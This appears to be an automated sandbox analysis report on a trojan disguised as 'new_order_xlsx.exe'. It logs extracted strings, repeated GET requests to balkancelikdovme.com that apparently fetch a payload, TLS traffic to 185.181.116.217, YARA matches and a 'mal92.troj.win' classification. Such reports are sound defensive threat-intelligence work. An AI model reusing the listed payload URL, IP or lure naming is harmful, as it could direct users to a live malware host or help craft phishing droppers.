              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:20 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Sep 2023 14:25:21 GMTvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              Source: new_order_xlsx.exe, 00000000.00000002.275793042.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://://t.exet.exe
              Source: new_order_xlsx.exe, 00000000.00000003.240666115.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
              Source: new_order_xlsx.exe, 00000000.00000003.233032153.0000000002830000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.232976125.00000000027FC000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233341342.0000000002856000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.232909822.0000000003524000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233225957.0000000002831000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233117182.0000000002830000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.277020844.0000000003639000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233052897.0000000002868000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.232945853.00000000035FA000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233583426.0000000002835000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233678764.0000000002835000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233175803.0000000002868000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233261183.0000000002830000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233481160.0000000002834000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.233077756.0000000002830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
              Source: new_order_xlsx.exe, 00000000.00000003.260073295.000000000097A000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.262261522.000000000097D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/L
              Source: new_order_xlsx.exe, 00000000.00000002.278968891.0000000015528000.00000004.00001000.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.240666115.0000000000962000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000002.275942535.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.262261522.00000000009AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf
              Source: new_order_xlsx.exe, 00000000.00000003.240666115.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwfr
              Source: new_order_xlsx.exe, 00000000.00000002.275942535.000000000097D000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.240666115.0000000000962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com/l
              Source: new_order_xlsx.exe, 00000000.00000003.262238156.0000000015D86000.00000004.00000020.00020000.00000000.sdmp, new_order_xlsx.exe, 00000000.00000003.260073295.00000000009C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com:443/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf
              Source: new_order_xlsx.exe, 00000000.00000002.275942535.0000000000969000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://balkancelikdovme.com:443/hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf-
              Source: unknownDNS traffic detected: queries for: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: global trafficHTTP traffic detected: GET /hjghgynyvbtvyugjhbugvdveksk/Jquktppcwwf HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: new_order_xlsx.exe, 00000000.00000002.275942535.00000000008DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>memstr_8620cdf4-5

              System Summary

              barindex
              Source: initial sampleStatic PE information: Filename: new_order_xlsx.exe
              Source: new_order_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: new_order_xlsx.exe, 00000000.00000003.233032153.0000000002830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.232976125.00000000027FC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.233341342.0000000002856000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.232909822.0000000003524000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.233225957.0000000002831000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.233117182.0000000002830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000002.277020844.0000000003639000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.233052897.0000000002868000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.232945853.00000000035FA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.233583426.0000000002835000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.233678764.0000000002835000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.233175803.0000000002868000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.233261183.0000000002830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.233481160.0000000002834000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: new_order_xlsx.exe, 00000000.00000003.233077756.0000000002830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs new_order_xlsx.exe
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1132
              Source: C:\Users\user\Desktop\new_order_xlsx.exeSection loaded: archiveint.dllJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeSection loaded: system.dllJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_0350B1200_3_0350B120
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_035019140_3_03501914
              Source: new_order_xlsx.exeReversingLabs: Detection: 78%
              Source: C:\Users\user\Desktop\new_order_xlsx.exeFile read: C:\Users\user\Desktop\new_order_xlsx.exeJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\new_order_xlsx.exe C:\Users\user\Desktop\new_order_xlsx.exe
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1132
              Source: C:\Users\user\Desktop\new_order_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6996
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6A4.tmpJump to behavior
              Source: classification engineClassification label: mal92.troj.winEXE@2/6@28/2
              Source: C:\Users\user\Desktop\new_order_xlsx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: new_order_xlsx.exeStatic file information: File size 1516544 > 1048576

              Data Obfuscation

              barindex
              Source: Yara matchFile source: new_order_xlsx.exe, type: SAMPLE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.2835580.125.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.new_order_xlsx.exe.3610000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.2832b58.117.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.2831148.116.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.new_order_xlsx.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.2831148.115.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.2830e6c.114.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.283502c.121.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.new_order_xlsx.exe.28352ec.123.raw.unpack, type: UNPACKEDPE
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_0350C34C push eax; ret 0_3_0350C388
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_0350F3CE push 004063CFh; ret 0_3_0350F423
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034FE132 push 004063CFh; ret 0_3_034FE187
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034FB0B0 push eax; ret 0_3_034FB0EC
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_0350F776 push 004067AAh; ret 0_3_0350F7FE
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_034FE526 push 004067AAh; ret 0_3_034FE562
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_03502B40 push eax; ret 0_3_03502B7C
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_03505FB6 push 004067AAh; ret 0_3_03505FF2
              Source: C:\Users\user\Desktop\new_order_xlsx.exeCode function: 0_3_0356CF54 push eax; ret 0_3_0356CF90
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\new_order_xlsx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
